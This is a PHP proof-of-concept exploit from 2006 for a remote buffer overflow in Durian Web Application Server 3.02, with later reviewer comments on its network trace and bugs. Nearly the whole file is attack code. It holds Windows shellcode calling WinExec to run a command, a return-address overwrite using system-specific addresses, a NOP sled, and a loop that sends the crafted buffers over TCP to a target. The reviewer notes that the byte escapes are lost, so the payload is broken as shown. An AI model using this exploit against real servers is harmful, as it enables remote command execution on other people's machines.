
# Title : Durian Web Application Server 3.02 Remote Buffer Overflow Exploit
# Published : 2006-12-29
# Author : rgod


<?php
/*
Durian Web Application Server 3.02 freeware for Win32 buffer
overflow execute command exploit

by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org

tested against xp sp2 ita

software site -> http://sourceforge.net/projects/durian/

*/

// Proof-of-concept driver from the original 2006 post. It opens one TCP
// connection per crafted buffer to the hard-coded host/port below, writes
// the buffer and closes the socket; no response is read. From a
// network-monitoring point of view the distinctive trace is 24 short-lived
// connections to port 4002 from one client, the first 23 carrying a run of
// a single repeated byte and the last a 2300-byte buffer.
error_reporting(E_ALL);
$address = "192.168.1.3";   // target host, hard-coded (lab address in the original post)
$service_port = "4002";     // service port; passed to socket_connect() as a string

// Payload string. NOTE(review): as this listing is rendered, the "x.." groups
// carry no backslash, so PHP sees them as literal ASCII characters rather
// than byte escapes -- the "\" characters were evidently lost in extraction.
// The two absolute addresses named in the trailing comments are specific to
// the kernel32 build of the "xp sp2 ita" system the author lists as tested.
$shellcode =
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbx6dx13x86x7c". //WinExec, 0x7c86136d
"xffxd3".
"x31xc0".
"x50".
"xbbxdaxcdx81x7c". //ExitProcess, 0x7c81cdda
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"cmd.exe /c start notepad & ";

// Value written over the saved return address (same escape caveat as above).
// The commented-out line is the author's alternative for a DEP-disabled host.
//$eip="x72xe0xf1x00";//DEP disabled
$eip="x72xe0xf2x00";

// Filler byte variants and buffer lengths. The loops below try every
// (byte, length) pair, 3 x 8 = 24 connections in total. Only the very last
// pair (j==2, i==7: "x41" at 2300 bytes) carries the crafted buffer; every
// other connection sends $size[$i] copies of $ch[$j].
$ch  =array("xaa","xa0","x41");
$size=array(30,70,150,330,520,700,1400,2300);

    for ($j=0; $j<count($ch); $j++){
        for ($i=0; $i<count($size); $i++){
            $junk="";
            if (($j==2) and ($i==7)){
                // Final iteration: two 92-character alphabetic runs (184 bytes),
                // then $eip, 100 filler bytes, the payload string, and padding
                // up to a total length of 2300.
                $junk ="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVXXXX";
                $junk.="YYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuu";
		$junk.=$eip; //jmp shellcode
		for ($n=1; $n<=100; $n++){
		    $junk.="x90";
		}
		$junk.=$shellcode;
                // NOTE(review): "$n=(...)" in the condition is an assignment,
                // not a comparison. The loop keeps appending until
                // strlen($junk) reaches 2300, where the expression becomes 0
                // (false); if $junk were already longer than 2300 the value
                // would be negative (truthy) and the loop would never end.
                for ($n=1; $n=(2300-strlen($junk)); $n++){
		    $junk.="x90";
		}
            }
            else {
                // All other iterations: a run of one repeated byte.
		for ($k=1; $k<=$size[$i]; $k++){
                    $junk.=$ch[$j];
                }
	    }
            // One connection per buffer, closed immediately after the write.
            // NOTE(review): socket_create() yields false on failure and
            // socket_connect() returns a bool, so neither "< 0" test below can
            // become true -- a failed connection is not reported here, and the
            // return value of socket_write() is discarded as well.
            $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
            if ($socket < 0) {
                die("socket_create() failed:n reason: " . socket_strerror($socket) . "n");
            }
            $result = socket_connect($socket, $address, $service_port);
            if ($result < 0) {
                die("socket_connect() failed:n reason: ($result) " . socket_strerror($result) . "n");
            }
            $in = $junk;
            socket_write($socket, $in, strlen ($in));
            socket_close($socket);
        }
   }
?>
